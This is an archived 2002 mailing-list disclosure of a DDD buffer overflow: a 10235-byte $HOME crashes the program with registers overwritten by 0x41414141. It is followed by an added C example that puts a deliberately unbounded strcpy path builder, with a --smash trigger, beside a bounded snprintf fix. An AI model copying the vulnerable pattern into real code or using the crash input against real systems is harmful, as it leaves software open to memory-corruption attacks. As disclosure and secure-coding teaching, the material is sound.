Vulnerability Development mailing list archives

ddd smashed


From: l0rt <simon () snosoft com>
Date: 15 Jan 2002 15:28:21 -0500

Werd...
========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be
           exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores but today I decided to try ddd and my
efforts failed.  When I set $HOME in my test account to 10235 A's and
tried to run ddd like this (I found an evolution core that will be
explained in my next post):


sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah...
/.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd, which uses
gdb.. heh...


Here is a dump of the registers...


eax            0x8572ec4        139931332
ecx            0x0      0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x120    288
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400bf242       1074524738
foseg          0x2b     43
fooff          0xbfffac86       -1073763194
fop            0x6a     106


smashed ;o)


-- 

-l0rt-
        
        Secure Network Operations
        Strategic Reconnaissance Team
        Team Key ID: ACFCBD01
        l0rt Key ID: 47BF3F87
        ------------------------------------------
        "That secret you've been guarding, isn't."
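
Added example (not from the post above, and not ddd's code): a minimal C
illustration of the bug class the register dump points to, a path assembled
from $HOME into a fixed-size stack buffer, beside a bounded version that
fails with ENAMETOOLONG ("File name too long") instead of overflowing. The
function names, the 256-byte buffer and the "/.ddd/themes/" suffix are
assumptions for illustration; the post does not show where ddd actually
copies $HOME, only that something downstream ends up at 0x41414141.

```c
/* Added example, not ddd's code: a fixed-size stack buffer filled from
 * $HOME (the bug class the 0x41414141 register dump suggests) beside a
 * bounded version.  Names, buffer size and path layout are assumptions. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256                 /* assumed size of the on-stack path buffer */
#define THEMES_SUFFIX "/.ddd/themes/"

/* Unbounded: assumes strlen(home) + strlen(THEMES_SUFFIX) < PATH_BUF.
 * A 10235-byte $HOME runs strcpy() past 'path', over the saved frame
 * pointer and the return address, so the function returns into
 * 0x41414141 (or aborts first if built with a stack canary or
 * _FORTIFY_SOURCE).  Returns the built length so a short input can be
 * checked without corrupting anything. */
static size_t build_theme_path_unsafe(const char *home)
{
    char path[PATH_BUF];

    strcpy(path, home);                 /* no length check */
    strcat(path, THEMES_SUFFIX);        /* still none */
    return strlen(path);                /* real code would open/stat path here */
}

/* Bounded: snprintf() never writes more than dstsz bytes, and its return
 * value says whether the whole path fit.  A too-long result is rejected
 * with ENAMETOOLONG instead of being truncated or overflowed; a missing
 * HOME (getenv() returned NULL) is rejected as well.
 * Returns 0 on success, -1 with errno set otherwise. */
static int build_theme_path_safe(const char *home, char *dst, size_t dstsz)
{
    int n;

    if (home == NULL || dst == NULL || dstsz == 0) {
        errno = EINVAL;
        return -1;
    }
    n = snprintf(dst, dstsz, "%s%s", home, THEMES_SUFFIX);
    if (n < 0)
        return -1;                      /* encoding error, errno set by snprintf */
    if ((size_t)n >= dstsz) {
        dst[0] = '\0';                  /* never leave a truncated path behind */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Constructed input, the same shape as the post's
 * export HOME=`perl -e'print "A" x 10235'`.  Caller frees it. */
static char *make_long_home(size_t n)
{
    char *s = malloc(n + 1);

    if (s == NULL)
        abort();
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    char buf[PATH_BUF];

    if (argc > 1 && strcmp(argv[1], "--smash") == 0) {
        char *home = make_long_home(10235);

        printf("calling the unbounded builder with %zu bytes of 'A'...\n",
               strlen(home));
        build_theme_path_unsafe(home);  /* SIGSEGV or canary abort, not a clean return */
        free(home);
        return 0;
    }

    if (build_theme_path_safe(getenv("HOME"), buf, sizeof buf) != 0) {
        perror("themes path");          /* "File name too long" for a 10235-byte HOME */
        return 1;
    }
    printf("themes dir: %s\n", buf);
    return 0;
}
```

Run it with no arguments and the bounded builder either prints the themes
directory or, with the post's 10235-byte $HOME exported, prints "themes
path: File name too long" and exits. Run it with --smash to feed the same
string to the unbounded builder: on an x86 build without a stack canary
that ends in SIGSEGV with the return address (and whatever callee-saved
registers the frame held) replaced by 0x41414141, as in the dump above; a
toolchain with -fstack-protector or _FORTIFY_SOURCE turns it into an abort,
which is the same overflow caught before the return executes.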
